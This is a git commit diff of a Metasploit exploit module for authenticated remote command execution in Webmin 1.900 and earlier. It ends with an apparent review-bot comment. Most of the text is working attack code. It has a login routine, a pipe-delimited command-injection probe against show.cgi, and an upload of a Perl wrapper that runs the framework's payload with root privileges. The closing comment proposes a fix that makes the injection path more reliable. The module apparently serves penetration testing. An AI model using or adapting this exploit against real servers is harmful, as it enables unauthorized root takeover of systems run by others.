Cleanup and Add Option

master
Jacob Robles 2019-03-14 13:26:41 -05:00
parent 1d586e46c0
commit fa3e84f764
No known key found for this signature in database
GPG Key ID: 3EC9F18F2B12401C
1 changed files with 15 additions and 13 deletions


@ -11,12 +11,11 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin Java File Manager Authenticated RCE',
'Name' => 'Webmin Upload Authenticated RCE',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.900 and lower versions. Any user authorized to the "Java file manager"
and "Upload and Download" fields can execute arbitrary commands with root
privileges.
1.900 and lower versions. Any user authorized to the "Upload and Download"
module can execute arbitrary commands with root privileges.
In addition, if the 'Running Processes' (proc) privilege is set the user can
accurately determine which directory to upload to. Webmin application files
@ -62,14 +61,15 @@ class MetasploitModule < Msf::Exploit::Remote
OptBool.new('GUESSUPLOAD', [true, 'If no "proc" permissions exists use default path.', false]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('FILENAME', [false, 'Filename used for the uploaded data'])
OptString.new('FILENAME', [false, 'Filename used for the uploaded data']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('session_login.cgi'),
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1',
'vars_post' => {
'page' => '',
@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
command = "echo #{rand_text_alphanumeric(0..9)}"
res = send_request_cgi({
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'uri' => "#{target_uri}/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{cookie}"
})
@ -128,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('proc', 'index_tree.cgi'),
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' =>
{
'Referer' => "#{phost}/sysinfo.cgi?xnavigation=1"
@ -162,20 +162,20 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi({
'uri' => normalize_uri('file', filename),
'uri' => normalize_uri(target_uri, 'file', filename),
'cookie' => "sid=#{cookie}"
})
end
def upload_attempt(phost, cookie, dir, filename)
boundary = rand_text_alphanumeric(29)
limit = rand_text_alpha_upper(5..10)
tmpvar = rand_text_alpha_upper(3..8)
code = <<~HERE
#!/usr/bin/perl
$var = <<'#{limit}';
$#{tmpvar} = <<'#{limit}';
#{payload.encoded}
#{limit}
`$var`;
`$#{tmpvar}`;
HERE
message = Rex::MIME::Message.new
@ -190,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
res2 = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('updown', 'upload.cgi'),
'uri' => normalize_uri(target_uri, 'updown', 'upload.cgi'),
'vars_get' => {'id' => "#{rand_text_numeric(8..12)}"},
'data' => message.to_s,
'ctype' => "multipart/form-data; boundary=#{message.bound}",
@ -203,8 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote
if res2 && res2.code == 200 && res2.body =~ /Saving file/
print_good "File #{filename} was successfully uploaded."
register_file_for_cleanup(filename)
else
print_error 'Upload failed.'
fail_with(Failure::UnexpectedReply, 'Failed to upload file')
end
end
end
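Review bot: The show.cgi request in the third hunk builds its path by interpolation, `"#{target_uri}/file/show.cgi/bin/..."`, while every other request touched by this commit goes through `normalize_uri(target_uri, ...)`. With the TARGETURI default of `/` registered in the second hunk, the interpolated form presumably begins with a double slash, and any base path ending in a slash would do the same. Building the prefix the same way as the other calls, for example `'uri' => normalize_uri(target_uri, 'file', 'show.cgi', 'bin') + "/#{rand_text_alphanumeric(5)}|#{command}|",`, keeps the path handling consistent. The method containing this request starts and ends outside the hunk, so its name and the rest of its body are not visible here.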